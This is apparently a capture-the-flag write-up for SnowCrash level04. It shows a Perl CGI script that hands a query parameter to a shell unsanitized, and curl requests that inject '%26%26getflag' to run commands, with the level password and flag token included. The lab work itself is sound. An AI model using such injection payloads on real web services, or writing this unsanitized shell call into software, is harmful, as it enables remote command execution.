96 lines
2.3 KiB
Markdown
96 lines
2.3 KiB
Markdown
# Level 04
|
|
|
|
## how to login
|
|
|
|
username: level04
|
|
|
|
password: qi0maab88jeaj46qoumi7maus
|
|
|
|
## Goal
|
|
|
|
run `getflag` as user `flag04`
|
|
|
|
## Actually doing something
|
|
|
|
```bash
|
|
level04@SnowCrash:~$ ll
|
|
total 16
|
|
dr-xr-x---+ 1 level04 level04 120 Mar 5 2016 ./
|
|
d--x--x--x 1 root users 340 Aug 30 2015 ../
|
|
-r-x------ 1 level04 level04 220 Apr 3 2012 .bash_logout*
|
|
-r-x------ 1 level04 level04 3518 Aug 30 2015 .bashrc*
|
|
-rwsr-sr-x 1 flag04 level04 152 Mar 5 2016 level04.pl*
|
|
-r-x------ 1 level04 level04 675 Apr 3 2012 .profile*
|
|
```
|
|
|
|
Hmmm `.pl`. Lets dig out the dinosaur and have fun with some Perl
|
|
|
|
```perl
|
|
#!/usr/bin/perl
|
|
# localhost:4747
|
|
use CGI qw{param};
|
|
print "Content-type: text/html\n\n";
|
|
sub x {
|
|
$y = $_[0];
|
|
print `echo $y 2>&1`;
|
|
}
|
|
x(param("x"));
|
|
```
|
|
|
|
This reeks of exploit
|
|
|
|
As I understand it this is used by the http server at localhost:4747, and on a request it takes the parameter `x` and returns it
|
|
|
|
The issue is how it returns it...
|
|
|
|
It forward it to a shell string, and print the result.
|
|
This is as secure as having a litteral endpoint that takes a command and return the result.
|
|
|
|
Why ? because the data is passed as is, without any form of sanitization, meaning that if we have any way of "leaving" the `echo`
|
|
command we can run whatever we want
|
|
|
|
for example `getflag`
|
|
|
|
we want this
|
|
```perl
|
|
print `echo $y 2>&1`
|
|
```
|
|
to become
|
|
```perl
|
|
print `echo idk && getflag 2>&1`
|
|
```
|
|
|
|
We are in shell, so we can remove the spaces around the `&&` meaning that `x` must be equal to `idk&&getflag`
|
|
|
|
but if we do it dumbly, nothing happens
|
|
|
|
```bash
|
|
level04@SnowCrash:~$ curl 'localhost:4747?x=idk&&getflag'
|
|
idk
|
|
```
|
|
|
|
Why ?
|
|
|
|
Because `&` has a special meaning in urls, it separetes query arguments. we need to escape it.
|
|
|
|
How ?
|
|
|
|
The standard says to use percent-encoding. Reading a bit more it says that `%26` is the escape code for `&`
|
|
|
|
lets replace it to get `idk%26%26getflag` and voila !
|
|
|
|
```bash
|
|
level04@SnowCrash:~$ curl 'localhost:4747?x=GetExploited%26%26getflag'
|
|
GetExploited
|
|
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
|
|
```
|
|
|
|
lets have a bit more fun. since we have access to the machine itself, we can create a file somewhere, and run it by giving it a path
|
|
|
|
```bash
|
|
level04@SnowCrash:~$ curl 'localhost:4747?x=idk%26%26/tmp/path/echo'
|
|
idk
|
|
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
|
|
```
|
|
|
|
Look mom, I recycle my stuff !
|